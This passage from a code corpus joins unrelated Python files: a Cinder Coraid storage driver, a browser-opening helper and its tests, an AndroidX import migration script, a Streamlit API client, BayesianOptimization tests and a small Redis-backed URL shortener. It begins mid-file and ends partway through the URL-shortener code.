directory_for_journal, 'vhd-util-resize-journal')
resize_vhd(parent, size, journal_file)
coalesce_vhd(child)
return vhd_chain[-1]
def discover_vhd_chain(directory):
counter = 0
chain = []
while True:
fpath = os.path.join(directory, '%d.vhd' % counter)
if file_exist(fpath):
chain.append(fpath)
else:
break
counter += 1
return chain
def replace_xenserver_image_with_coalesced_vhd(image_file):
with temporary_dir() as tempdir:
extract_targz(image_file, tempdir)
chain = discover_vhd_chain(tempdir)
fix_vhd_chain(chain)
coalesced = coalesce_chain(chain)
fileutils.delete_if_exists(image_file)
rename_file(coalesced, image_file)
|
adelina-t/cinder | cinder/volume/drivers/coraid.py | # Copyright 2012 Alyseo.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Desc : Driver to store volumes on Coraid Appliances.
Require : Coraid EtherCloud ESM, Coraid VSX and Coraid SRX.
Author : <NAME> <<EMAIL>>
Author : <NAME> <<EMAIL>>
Author : <NAME> <<EMAIL>>
Contrib : <NAME> <<EMAIL>>
"""
import cookielib
import math
import urllib
import urllib2
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import jsonutils
from cinder.openstack.common import lockutils
from cinder.openstack.common import log as logging
from cinder.openstack.common import units
from cinder.volume import driver
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
coraid_opts = [
cfg.StrOpt('coraid_esm_address',
default='',
help='IP address of Coraid ESM'),
cfg.StrOpt('coraid_user',
default='admin',
help='User name to connect to Coraid ESM'),
cfg.StrOpt('coraid_group',
default='admin',
help='Name of group on Coraid ESM to which coraid_user belongs'
' (must have admin privilege)'),
cfg.StrOpt('coraid_password',
default='password',
help='Password to connect to Coraid ESM'),
cfg.StrOpt('coraid_repository_key',
default='coraid_repository',
help='Volume Type key name to store ESM Repository Name'),
]
CONF = cfg.CONF
CONF.register_opts(coraid_opts)
ESM_SESSION_EXPIRED_STATES = ['GeneralAdminFailure',
'passwordInactivityTimeout',
'passwordAbsoluteTimeout']
class CoraidRESTClient(object):
"""Executes REST RPC requests on Coraid ESM EtherCloud Appliance."""
def __init__(self, esm_url):
self._check_esm_url(esm_url)
self._esm_url = esm_url
self._cookie_jar = cookielib.CookieJar()
self._url_opener = urllib2.build_opener(
urllib2.HTTPCookieProcessor(self._cookie_jar))
def _check_esm_url(self, esm_url):
splitted = urlparse.urlsplit(esm_url)
if splitted.scheme != 'https':
raise ValueError(
_('Invalid ESM url scheme "%s". Supported https only.') %
splitted.scheme)
@lockutils.synchronized('coraid_rpc', 'cinder-', False)
def rpc(self, handle, url_params, data, allow_empty_response=False):
return self._rpc(handle, url_params, data, allow_empty_response)
def _rpc(self, handle, url_params, data, allow_empty_response):
"""Execute REST RPC using url <esm_url>/handle?url_params.
Send JSON encoded data in body of POST request.
Exceptions:
urllib2.URLError
1. Name or service not found (e.reason is socket.gaierror)
2. Socket blocking operation timeout (e.reason is
socket.timeout)
3. Network IO error (e.reason is socket.error)
urllib2.HTTPError
1. HTTP 404, HTTP 500 etc.
CoraidJsonEncodeFailure - bad REST response
"""
# Handle must be simple path, for example:
# /configure
if '?' in handle or '&' in handle:
raise ValueError(_('Invalid REST handle name. Expected path.'))
# Request url includes base ESM url, handle path and optional
# URL params.
rest_url = urlparse.urljoin(self._esm_url, handle)
encoded_url_params = urllib.urlencode(url_params)
if encoded_url_params:
rest_url += '?' + encoded_url_params
if data is None:
json_request = None
else:
json_request = jsonutils.dumps(data)
request = urllib2.Request(rest_url, json_request)
response = self._url_opener.open(request).read()
try:
if not response and allow_empty_response:
reply = {}
else:
reply = jsonutils.loads(response)
except (TypeError, ValueError) as exc:
msg = (_('Call to json.loads() failed: %(ex)s.'
' Response: %(resp)s') %
{'ex': exc, 'resp': response})
raise exception.CoraidJsonEncodeFailure(msg)
return reply
def to_coraid_kb(gb):
return math.ceil(float(gb) * units.Gi / 1000)
def coraid_volume_size(gb):
return '{0}K'.format(to_coraid_kb(gb))
class CoraidAppliance(object):
def __init__(self, rest_client, username, password, group):
self._rest_client = rest_client
self._username = username
self._password = password
self._group = group
self._logined = False
def _login(self):
"""Login into ESM.
Perform login request and return available groups.
:returns: dict -- map with group_name to group_id
"""
ADMIN_GROUP_PREFIX = 'admin group:'
url_params = {'op': 'login',
'username': self._username,
'password': self._password}
reply = self._rest_client.rpc('admin', url_params, 'Login')
if reply['state'] != 'adminSucceed':
raise exception.CoraidESMBadCredentials()
# Read groups map from login reply.
groups_map = {}
for group_info in reply.get('values', []):
full_group_name = group_info['fullPath']
if full_group_name.startswith(ADMIN_GROUP_PREFIX):
group_name = full_group_name[len(ADMIN_GROUP_PREFIX):]
groups_map[group_name] = group_info['groupId']
return groups_map
def _set_effective_group(self, groups_map, group):
"""Set effective group.
Use groups_map returned from _login method.
"""
try:
group_id = groups_map[group]
except KeyError:
raise exception.CoraidESMBadGroup(group_name=group)
url_params = {'op': 'setRbacGroup',
'groupId': group_id}
reply = self._rest_client.rpc('admin', url_params, 'Group')
if reply['state'] != 'adminSucceed':
raise exception.CoraidESMBadCredentials()
self._logined = True
def _ensure_session(self):
if not self._logined:
groups_map = self._login()
self._set_effective_group(groups_map, self._group)
def _relogin(self):
self._logined = False
self._ensure_session()
def rpc(self, handle, url_params, data, allow_empty_response=False):
self._ensure_session()
relogin_attempts = 3
# Do action, relogin if needed and repeat action.
while True:
reply = self._rest_client.rpc(handle, url_params, data,
allow_empty_response)
if self._is_session_expired(reply):
relogin_attempts -= 1
if relogin_attempts <= 0:
raise exception.CoraidESMReloginFailed()
LOG.debug('Session is expired. Relogin on ESM.')
self._relogin()
else:
return reply
def _is_session_expired(self, reply):
return ('state' in reply and
reply['state'] in ESM_SESSION_EXPIRED_STATES and
reply['metaCROp'] == 'reboot')
def _is_bad_config_state(self, reply):
return (not reply or
'configState' not in reply or
reply['configState'] != 'completedSuccessfully')
def configure(self, json_request):
reply = self.rpc('configure', {}, json_request)
if self._is_bad_config_state(reply):
# Calculate error message
if not reply:
reason = _('Reply is empty.')
else:
reason = reply.get('message', _('Error message is empty.'))
raise exception.CoraidESMConfigureError(reason=reason)
return reply
def esm_command(self, request):
request['data'] = jsonutils.dumps(request['data'])
return self.configure([request])
def get_volume_info(self, volume_name):
"""Retrieve volume information for a given volume name."""
url_params = {'shelf': 'cms',
'orchStrRepo': '',
'lv': volume_name}
reply = self.rpc('fetch', url_params, None)
try:
volume_info = reply[0][1]['reply'][0]
except (IndexError, KeyError):
raise exception.VolumeNotFound(volume_id=volume_name)
return {'pool': volume_info['lv']['containingPool'],
'repo': volume_info['repoName'],
'lun': volume_info['lv']['lvStatus']['exportedLun']['lun'],
'shelf': volume_info['lv']['lvStatus']['exportedLun']['shelf']}
def get_volume_repository(self, volume_name):
volume_info = self.get_volume_info(volume_name)
return volume_info['repo']
def get_all_repos(self):
reply = self.rpc('fetch', {'orchStrRepo': ''}, None)
try:
return reply[0][1]['reply']
except (IndexError, KeyError):
return []
def ping(self):
try:
self.rpc('fetch', {}, None, allow_empty_response=True)
except Exception as e:
LOG.debug('Coraid Appliance ping failed: %s', e)
raise exception.CoraidESMNotAvailable(reason=e)
def create_lun(self, repository_name, volume_name, volume_size_in_gb):
request = {'addr': 'cms',
'data': {
'servers': [],
'repoName': repository_name,
'lvName': volume_name,
'size': coraid_volume_size(volume_size_in_gb)},
'op': 'orchStrLun',
'args': 'add'}
esm_result = self.esm_command(request)
LOG.debug('Volume "%(name)s" created with VSX LUN "%(lun)s"' %
{'name': volume_name,
'lun': esm_result['firstParam']})
return esm_result
def delete_lun(self, volume_name):
repository_name = self.get_volume_repository(volume_name)
request = {'addr': 'cms',
'data': {
'repoName': repository_name,
'lvName': volume_name},
'op': 'orchStrLun/verified',
'args': 'delete'}
esm_result = self.esm_command(request)
LOG.debug('Volume "%s" deleted.', volume_name)
return esm_result
def resize_volume(self, volume_name, new_volume_size_in_gb):
LOG.debug('Resize volume "%(name)s" to %(size)s GB.' %
{'name': volume_name,
'size': new_volume_size_in_gb})
repository = self.get_volume_repository(volume_name)
LOG.debug('Repository for volume "%(name)s" found: "%(repo)s"' %
{'name': volume_name,
'repo': repository})
request = {'addr': 'cms',
'data': {
'lvName': volume_name,
'newLvName': volume_name + '-resize',
'size': coraid_volume_size(new_volume_size_in_gb),
'repoName': repository},
'op': 'orchStrLunMods',
'args': 'resize'}
esm_result = self.esm_command(request)
LOG.debug('Volume "%(name)s" resized. New size is %(size)s GB.' %
{'name': volume_name,
'size': new_volume_size_in_gb})
return esm_result
def create_snapshot(self, volume_name, snapshot_name):
volume_repository = self.get_volume_repository(volume_name)
request = {'addr': 'cms',
'data': {
'repoName': volume_repository,
'lvName': volume_name,
'newLvName': snapshot_name},
'op': 'orchStrLunMods',
'args': 'addClSnap'}
esm_result = self.esm_command(request)
return esm_result
def delete_snapshot(self, snapshot_name):
repository_name = self.get_volume_repository(snapshot_name)
request = {'addr': 'cms',
'data': {
'repoName': repository_name,
'lvName': snapshot_name},
'op': 'orchStrLunMods',
'args': 'delClSnap'}
esm_result = self.esm_command(request)
return esm_result
def create_volume_from_snapshot(self,
snapshot_name,
volume_name,
dest_repository_name):
snapshot_repo = self.get_volume_repository(snapshot_name)
request = {'addr': 'cms',
'data': {
'lvName': snapshot_name,
'repoName': snapshot_repo,
'newLvName': volume_name,
'newRepoName': dest_repository_name},
'op': 'orchStrLunMods',
'args': 'addClone'}
esm_result = self.esm_command(request)
return esm_result
def clone_volume(self,
src_volume_name,
dst_volume_name,
dst_repository_name):
src_volume_info = self.get_volume_info(src_volume_name)
if src_volume_info['repo'] != dst_repository_name:
raise exception.CoraidException(
_('Cannot create clone volume in different repository.'))
request = {'addr': 'cms',
'data': {
'shelfLun': '{0}.{1}'.format(src_volume_info['shelf'],
src_volume_info['lun']),
'lvName': src_volume_name,
'repoName': src_volume_info['repo'],
'newLvName': dst_volume_name,
'newRepoName': dst_repository_name},
'op': 'orchStrLunMods',
'args': 'addClone'}
return self.esm_command(request)
class CoraidDriver(driver.VolumeDriver):
"""This is the Class to set in cinder.conf (volume_driver)."""
VERSION = '1.0.0'
def __init__(self, *args, **kwargs):
super(CoraidDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(coraid_opts)
self._stats = {'driver_version': self.VERSION,
'free_capacity_gb': 'unknown',
'reserved_percentage': 0,
'storage_protocol': 'aoe',
'total_capacity_gb': 'unknown',
'vendor_name': 'Coraid'}
backend_name = self.configuration.safe_get('volume_backend_name')
self._stats['volume_backend_name'] = backend_name or 'EtherCloud ESM'
@property
def appliance(self):
# NOTE(nsobolevsky): This is workaround for bug in the ESM appliance.
# If there is a lot of request with the same session/cookie/connection,
# the appliance could corrupt all following request in session.
# For that purpose we just create a new appliance.
esm_url = "https://{0}:8443".format(
self.configuration.coraid_esm_address)
return CoraidAppliance(CoraidRESTClient(esm_url),
self.configuration.coraid_user,
self.configuration.coraid_password,
self.configuration.coraid_group)
def check_for_setup_error(self):
"""Return an error if prerequisites aren't met."""
self.appliance.ping()
def _get_repository(self, volume_type):
"""Get the ESM Repository from the Volume Type.
The ESM Repository is stored into a volume_type_extra_specs key.
"""
volume_type_id = volume_type['id']
repository_key_name = self.configuration.coraid_repository_key
repository = volume_types.get_volume_type_extra_specs(
volume_type_id, repository_key_name)
# Remove <in> keyword from repository name if needed
if repository.startswith('<in> '):
return repository[len('<in> '):]
else:
return repository
def create_volume(self, volume):
"""Create a Volume."""
repository = self._get_repository(volume['volume_type'])
self.appliance.create_lun(repository, volume['name'], volume['size'])
def create_cloned_volume(self, volume, src_vref):
dst_volume_repository = self._get_repository(volume['volume_type'])
self.appliance.clone_volume(src_vref['name'],
volume['name'],
dst_volume_repository)
if volume['size'] != src_vref['size']:
self.appliance.resize_volume(volume['name'], volume['size'])
def delete_volume(self, volume):
"""Delete a Volume."""
try:
self.appliance.delete_lun(volume['name'])
except exception.VolumeNotFound:
self.appliance.ping()
def create_snapshot(self, snapshot):
"""Create a Snapshot."""
volume_name = snapshot['volume_name']
snapshot_name = snapshot['name']
self.appliance.create_snapshot(volume_name, snapshot_name)
def delete_snapshot(self, snapshot):
"""Delete a Snapshot."""
snapshot_name = snapshot['name']
self.appliance.delete_snapshot(snapshot_name)
def create_volume_from_snapshot(self, volume, snapshot):
"""Create a Volume from a Snapshot."""
snapshot_name = snapshot['name']
repository = self._get_repository(volume['volume_type'])
self.appliance.create_volume_from_snapshot(snapshot_name,
volume['name'],
repository)
if volume['size'] > snapshot['volume_size']:
self.appliance.resize_volume(volume['name'], volume['size'])
def extend_volume(self, volume, new_size):
"""Extend an existing volume."""
self.appliance.resize_volume(volume['name'], new_size)
def initialize_connection(self, volume, connector):
"""Return connection information."""
volume_info = self.appliance.get_volume_info(volume['name'])
shelf = volume_info['shelf']
lun = volume_info['lun']
LOG.debug('Initialize connection %(shelf)s/%(lun)s for %(name)s' %
{'shelf': shelf,
'lun': lun,
'name': volume['name']})
aoe_properties = {'target_shelf': shelf,
'target_lun': lun}
return {'driver_volume_type': 'aoe',
'data': aoe_properties}
def _get_repository_capabilities(self):
repos_list = map(lambda i: i['profile']['fullName'] + ':' + i['name'],
self.appliance.get_all_repos())
return ' '.join(repos_list)
def update_volume_stats(self):
capabilities = self._get_repository_capabilities()
self._stats[self.configuration.coraid_repository_key] = capabilities
def get_volume_stats(self, refresh=False):
"""Return Volume Stats."""
if refresh:
self.update_volume_stats()
return self._stats
def local_path(self, volume):
pass
def create_export(self, context, volume):
pass
def remove_export(self, context, volume):
pass
def terminate_connection(self, volume, connector, **kwargs):
pass
def ensure_export(self, context, volume):
pass
|
woodpecker324/wrappedbrowser | tests/test_wrappedbrowser.py | <reponame>woodpecker324/wrappedbrowser
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `wrappedbrowser` package."""
import webbrowser
from unittest.mock import MagicMock
import pytest
from wrappedbrowser import wrappedbrowser
from wrappedbrowser.errors import InvalidDestinationError
def test_with_browser_type(mocker):
"""Test with an explicit browser type."""
mocker.patch.object(webbrowser, "get")
wrappedbrowser.open("https://www.example.com", "chromium-browser")
webbrowser.get.assert_called_once_with("chromium-browser")
def test_open_one_url(mocker):
"""Test with a single url."""
mocked_browser = MagicMock()
mocker.patch.object(webbrowser, "get", return_value=mocked_browser)
mocker.patch.object(mocked_browser, "open_new")
wrappedbrowser.open("https://www.example.com")
webbrowser.get.assert_called_once()
mocked_browser.open_new.assert_called_once_with("https://www.example.com")
def test_open_two_urls(mocker):
"""Test with a list of urls."""
mocked_browser = MagicMock()
mocker.patch.object(webbrowser, "get", return_value=mocked_browser)
mocker.patch.object(mocked_browser, "open_new")
wrappedbrowser.open(["https://www.example.com", "https://www.python.org"])
webbrowser.get.assert_called_once()
mocked_browser.open_new.assert_called_once_with("https://www.example.com")
mocked_browser.open_new_tab.assert_called_once_with("https://www.python.org")
def test_invalid_destination():
with pytest.raises(InvalidDestinationError):
wrappedbrowser.open(5)
|
woodpecker324/wrappedbrowser | wrappedbrowser/errors.py | """Errors for `wrappedbrowser`"""
class BaseWrappedbrowserError(Exception):
"""The base error class.
`wrappedbrowser` error classes should inherit from this."""
pass
class InvalidDestinationError(BaseWrappedbrowserError):
"""The destination provided is not a valid url or list of url-s."""
pass
|
woodpecker324/wrappedbrowser | wrappedbrowser/wrappedbrowser.py | <reponame>woodpecker324/wrappedbrowser
# -*- coding: utf-8 -*-
"""Main module."""
import webbrowser
from wrappedbrowser.errors import InvalidDestinationError
def open(destination, browser_type=None):
"""Opens a single url or a list of urls.
``destination``:
If it's a string, it's opened if possible in a new window.
If it's a list, all url-s are opened.
``browser_type``:
Optional.
If provided, it's passed to the `webbrowser.get` function.
"""
browser = _get_browser(browser_type)
if isinstance(destination, str):
browser.open_new(destination)
return
if isinstance(destination, list):
_open_multiple(destination, browser)
return
raise InvalidDestinationError
def _open_multiple(urls, browser):
browser.open_new(urls[0])
if len(urls) > 1:
for u in urls[1:]:
browser.open_new_tab(u)
def _get_browser(btype):
if btype is None:
return webbrowser.get()
return webbrowser.get(btype)
|
yeswanth/MigrateToAndroidX | migrateToAndroidX.py | import csv
import glob
import os
import argparse
cwd = os.getcwd()
csvfile_path = cwd + "/androidx-class-mapping.csv"
csvfile = open(csvfile_path)
to_include_replacement_patterns = [
"android.support.annotation",
"android.support.annotation.RequiresPermission",
"android.support.design",
"android.support.v4",
]
search_string = "**/src/main/java/**/*.java"
"""
1. Looks at the csv file
2. Looks for the patterns
3. Returns a dictionary of old import and new import
"""
def get_replacements():
replacements = {}
for row in csv.reader(csvfile):
for pattern in to_include_replacement_patterns:
if row[0].find(pattern) == 0:
replacements[row[0]] = row[1]
return replacements
"""
1. Looks for all the files that fall into the pattern
2. It searches for the old imports in each of the file and replaces
with the new imports
3. Saves the files after replacing
"""
def search_files(file_path):
i = 0
replacements = get_replacements()
file_names = glob.glob(file_path + search_string,recursive=True)
for file_name in file_names:
file_data = open(file_name, 'r').read()
for k,v in replacements.items():
if file_data.find(k) != -1:
i = i + 1
print(file_name,k,v)
file_data = file_data.replace(k,v)
open(file_name, 'w').write(file_data)
print("== Migrated ",i+1, " files to AndroidX imports ==\n")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Migrate your React-Native app to use AndroidX')
parser.add_argument('--node_modules', dest='node_modules_path', help='Node Modules folder location')
args = parser.parse_args()
if args.node_modules_path:
search_files(args.node_modules_path)
else:
print("Invalid arguments. Use -h to see help on how to use this script")
|
pergrin/fictional-happiness-front | app.py | import streamlit as st
import requests
def send_request(text, length):
api_url = 'https://finished-fictional-happiness-pergrin.endpoint.ainize.ai/predict'
data = {
'base_text': (None, text),
'length': (None, length),
}
response = requests.post(api_url, data=data)
status_code = response.status_code
return status_code, response
st.title("Joint Entity and Relation extraction")
st.header("Get Entities and Relations amongst ")
length_slider = st.sidebar.slider("Length", 0, 300)
base_story = st.text_input("Type Base Story", "\"In our current research into the design of cognitively well-motivated interfaces relying primarily on the display of graphical information, we have observed that graphical information alone does not provide sufficient support to users-particularly when situations arise that do not simply conform to the users' expectations. This can occur due to too much information being requested, too little, information of the wrong kind, etc.. To solve this problem, we are working towards the integration of natural language generation to augment the interaction\"")
if st.button("Submit"):
if length_slider == 0:
st.warning("Please define the length")
else:
status_code, response = send_request(base_story, length_slider)
if status_code == 200:
prediction = response.json()
st.success(prediction["prediction"])
else:
st.error(str(status_code) + " Error")
|
Golbstein/BayesianOptimization | tests/test_bayesian_optimization.py | <filename>tests/test_bayesian_optimization.py
import pytest
import numpy as np
from bayes_opt import UtilityFunction
from bayes_opt import BayesianOptimization
from bayes_opt.logger import ScreenLogger
from bayes_opt.event import Events, DEFAULT_EVENTS
def target_func(**kwargs):
# arbitrary target func
return sum(kwargs.values())
PBOUNDS = {'p1': (0, 10), 'p2': (0, 10)}
def test_register():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert len(optimizer.space) == 0
optimizer.register(params={"p1": 1, "p2": 2}, target=3)
assert len(optimizer.res) == 1
assert len(optimizer.space) == 1
optimizer.space.register(params={"p1": 5, "p2": 4}, target=9)
assert len(optimizer.res) == 2
assert len(optimizer.space) == 2
with pytest.raises(KeyError):
optimizer.register(params={"p1": 1, "p2": 2}, target=3)
with pytest.raises(KeyError):
optimizer.register(params={"p1": 5, "p2": 4}, target=9)
def test_probe_lazy():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
optimizer.probe(params={"p1": 1, "p2": 2}, lazy=True)
assert len(optimizer.space) == 0
assert len(optimizer._queue) == 1
optimizer.probe(params={"p1": 6, "p2": 2}, lazy=True)
assert len(optimizer.space) == 0
assert len(optimizer._queue) == 2
optimizer.probe(params={"p1": 6, "p2": 2}, lazy=True)
assert len(optimizer.space) == 0
assert len(optimizer._queue) == 3
def test_probe_eager():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
optimizer.probe(params={"p1": 1, "p2": 2}, lazy=False)
assert len(optimizer.space) == 1
assert len(optimizer._queue) == 0
assert optimizer.max["target"] == 3
assert optimizer.max["params"] == {"p1": 1, "p2": 2}
optimizer.probe(params={"p1": 3, "p2": 3}, lazy=False)
assert len(optimizer.space) == 2
assert len(optimizer._queue) == 0
assert optimizer.max["target"] == 6
assert optimizer.max["params"] == {"p1": 3, "p2": 3}
optimizer.probe(params={"p1": 3, "p2": 3}, lazy=False)
assert len(optimizer.space) == 2
assert len(optimizer._queue) == 0
assert optimizer.max["target"] == 6
assert optimizer.max["params"] == {"p1": 3, "p2": 3}
def test_suggest_at_random():
util = UtilityFunction(kind="poi", kappa=5, xi=0)
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
for _ in range(50):
sample = optimizer.space.params_to_array(optimizer.suggest(util))
assert len(sample) == optimizer.space.dim
assert all(sample >= optimizer.space.bounds[:, 0])
assert all(sample <= optimizer.space.bounds[:, 1])
def test_suggest_with_one_observation():
util = UtilityFunction(kind="ucb", kappa=5, xi=0)
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
optimizer.register(params={"p1": 1, "p2": 2}, target=3)
for _ in range(5):
sample = optimizer.space.params_to_array(optimizer.suggest(util))
assert len(sample) == optimizer.space.dim
assert all(sample >= optimizer.space.bounds[:, 0])
assert all(sample <= optimizer.space.bounds[:, 1])
# suggestion = optimizer.suggest(util)
# for _ in range(5):
# new_suggestion = optimizer.suggest(util)
# assert suggestion == new_suggestion
def test_prime_queue_all_empty():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert len(optimizer._queue) == 0
assert len(optimizer.space) == 0
optimizer._prime_queue(init_points=0)
assert len(optimizer._queue) == 1
assert len(optimizer.space) == 0
def test_prime_queue_empty_with_init():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert len(optimizer._queue) == 0
assert len(optimizer.space) == 0
optimizer._prime_queue(init_points=5)
assert len(optimizer._queue) == 5
assert len(optimizer.space) == 0
def test_prime_queue_with_register():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert len(optimizer._queue) == 0
assert len(optimizer.space) == 0
optimizer.register(params={"p1": 1, "p2": 2}, target=3)
optimizer._prime_queue(init_points=0)
assert len(optimizer._queue) == 0
assert len(optimizer.space) == 1
def test_prime_queue_with_register_and_init():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert len(optimizer._queue) == 0
assert len(optimizer.space) == 0
optimizer.register(params={"p1": 1, "p2": 2}, target=3)
optimizer._prime_queue(init_points=3)
assert len(optimizer._queue) == 3
assert len(optimizer.space) == 1
def test_prime_subscriptions():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
optimizer._prime_subscriptions()
# Test that the default observer is correctly subscribed
for event in DEFAULT_EVENTS:
assert all([
isinstance(k, ScreenLogger) for k in
optimizer._events[event].keys()
])
assert all([
hasattr(k, "update") for k in
optimizer._events[event].keys()
])
test_subscriber = "test_subscriber"
def test_callback(event, instance):
pass
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
optimizer.subscribe(
event=Events.OPTMIZATION_START,
subscriber=test_subscriber,
callback=test_callback,
)
# Test that the desired observer is subscribed
assert all([
k == test_subscriber for k in
optimizer._events[Events.OPTMIZATION_START].keys()
])
assert all([
v == test_callback for v in
optimizer._events[Events.OPTMIZATION_START].values()
])
# Check that prime subscriptions won't overight manual subscriptions
optimizer._prime_subscriptions()
assert all([
k == test_subscriber for k in
optimizer._events[Events.OPTMIZATION_START].keys()
])
assert all([
v == test_callback for v in
optimizer._events[Events.OPTMIZATION_START].values()
])
assert optimizer._events[Events.OPTMIZATION_STEP] == {}
assert optimizer._events[Events.OPTMIZATION_END] == {}
with pytest.raises(KeyError):
optimizer._events["other"]
def test_set_bounds():
pbounds = {
'p1': (0, 1),
'p3': (0, 3),
'p2': (0, 2),
'p4': (0, 4),
}
optimizer = BayesianOptimization(target_func, pbounds, random_state=1)
# Ignore unknown keys
optimizer.set_bounds({"other": (7, 8)})
assert all(optimizer.space.bounds[:, 0] == np.array([0, 0, 0, 0]))
assert all(optimizer.space.bounds[:, 1] == np.array([1, 2, 3, 4]))
# Update bounds accordingly
optimizer.set_bounds({"p2": (1, 8)})
assert all(optimizer.space.bounds[:, 0] == np.array([0, 1, 0, 0]))
assert all(optimizer.space.bounds[:, 1] == np.array([1, 8, 3, 4]))
def test_set_gp_params():
optimizer = BayesianOptimization(target_func, PBOUNDS, random_state=1)
assert optimizer._gp.alpha == 1e-6
assert optimizer._gp.n_restarts_optimizer == 25
optimizer.set_gp_params(alpha=1e-2)
assert optimizer._gp.alpha == 1e-2
assert optimizer._gp.n_restarts_optimizer == 25
optimizer.set_gp_params(n_restarts_optimizer=7)
assert optimizer._gp.alpha == 1e-2
assert optimizer._gp.n_restarts_optimizer == 7
def test_maximize():
from sklearn.exceptions import NotFittedError
class Tracker:
def __init__(self):
self.start_count = 0
self.step_count = 0
self.end_count = 0
def update_start(self, event, instance):
self.start_count += 1
def update_step(self, event, instance):
self.step_count += 1
def update_end(self, event, instance):
self.end_count += 1
def reset(self):
self.__init__()
optimizer = BayesianOptimization(target_func, PBOUNDS,
random_state=np.random.RandomState(1))
tracker = Tracker()
optimizer.subscribe(
event=Events.OPTMIZATION_START,
subscriber=tracker,
callback=tracker.update_start,
)
optimizer.subscribe(
event=Events.OPTMIZATION_STEP,
subscriber=tracker,
callback=tracker.update_step,
)
optimizer.subscribe(
event=Events.OPTMIZATION_END,
subscriber=tracker,
callback=tracker.update_end,
)
optimizer.maximize(init_points=0, n_iter=0)
assert optimizer._queue.empty
assert len(optimizer.space) == 1
assert tracker.start_count == 1
assert tracker.step_count == 1
assert tracker.end_count == 1
optimizer.maximize(init_points=2, n_iter=0, alpha=1e-2)
assert optimizer._queue.empty
assert len(optimizer.space) == 3
assert optimizer._gp.alpha == 1e-2
assert tracker.start_count == 2
assert tracker.step_count == 3
assert tracker.end_count == 2
optimizer.maximize(init_points=0, n_iter=2)
assert optimizer._queue.empty
assert len(optimizer.space) == 5
assert tracker.start_count == 3
assert tracker.step_count == 5
assert tracker.end_count == 3
if __name__ == '__main__':
r"""
CommandLine:
python tests/test_bayesian_optimization.py
"""
pytest.main([__file__])
|
3ep-one/urlshortener | urlshortener/requesthandler.py | <filename>urlshortener/requesthandler.py<gh_stars>0
import configparser
from io import BytesIO
import json
from http.server import HTTPServer, BaseHTTPRequestHandler
from UrlShortener import UrlShortener
class HttpHandler(BaseHTTPRequestHandler):
def __init__(self):
config = configparser.ConfigParser()
config.read('handler.ini')
self.linsten_ip = config['httphandler']['ip']
self.listen_port = config['httphandler']['port']
def do_GET(self):
self.send_response(400)
self.end_headers()
self.wfile.write(b'Bad request method!')
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
response = BytesIO()
request_body_dict = json.loads(body.decode('utf8'))
if('url' in request_body_dict):
request_url = request_body_dict['url']
url_shortener = UrlShortener()
shortend_url = url_shortener.shorten_url(str(request_url))
json_response = json.dumps({request_url: shortend_url})
self.send_response(200)
self.end_headers()
response.write(json_response.encode('utf8'))
self.wfile.write(response.getvalue())
else:
self.send_response(400)
self.end_headers()
response.write(b'Bad request param!')
self.wfile.write(response.getvalue())
def handle_requests(self):
http_handler = HTTPServer((self.listen_port, self.listen_port),
HttpHandler)
http_handler.serve_forever()
|
3ep-one/urlshortener | urlshortener/__main__.py | from RequestHandler import HttpHandler
def main():
http_handler = HttpHandler()
http_handler.handle_requests()
if __name__ == "__main__":
main()
|
3ep-one/urlshortener | test/test_urlshortner.py | <filename>test/test_urlshortner.py
import unittest
import mock
from UrlShortener import UrlShortener
from Redis import Redis
import re
class TestUrlShortner(unittest.TestCase):
url_shortner = UrlShortener()
def test_url_encoder_function(self):
"""
Test url_encoder function behavior
"""
encoded_url = self.url_shortner.url_encoder(10000000)
self.assertEqual(encoded_url, 'oCba')
@mock.patch.object(Redis, 'does_key_exist', return_value=True)
@mock.patch.object(Redis, 'get_value_by_key', return_value=237)
def test_shorten_url_key_exist(self, *_):
"""
Test shorten_url when url already exist
"""
url_key_id = self.url_shortner.shorten_url('test')
regex_search = bool(re.search(r'.*/3f$', url_key_id))
self.assertEqual(regex_search, True)
@mock.patch.object(Redis, 'does_key_exist', return_value=False)
@mock.patch.object(Redis, 'get_value_by_key')
@mock.patch.object(Redis, 'add_key_value')
@mock.patch.object(UrlShortener, 'url_encoder', return_value='aB3')
def test_shorten_url_add_key(self, *_):
"""
Test shorten_url when url doesn't exist
"""
shotrened_url = self.url_shortner.shorten_url('test')
regex_search = bool(re.search(r'.*/aB3$', shotrened_url))
self.assertEqual(regex_search, True)
if __name__ == '__main__':
unittest.main()
|
3ep-one/urlshortener | urlshortener/redis.py | import redis
import configparser
class Redis:
def __init__(self):
self.redis_db = self.connect_to_redis()
config = configparser.ConfigParser()
config.read('db.ini')
self.redis_host = config['redis']['host']
self.redis_port = config['redis']['port']
self.redis_pass = config['redis']['pass']
def connect_to_redis(self):
return redis.Redis(
host=self.redis_host,
port=self.redis_port,
password=None)
def add_key_value(self, key, value):
self.redis_db.set(key, value)
def get_value_by_key(self, key):
return self.redis_db.get(key)
def does_key_exist(self, key):
print(key)
if(self.redis_db.exists(key)):
return True
return False
def remove_key(self, key):
self.redis_db.delete(key)
|
3ep-one/urlshortener | urlshortener/urlshortener.py | import configparser
from Redis import Redis
class UrlShortener:
def __init__(self):
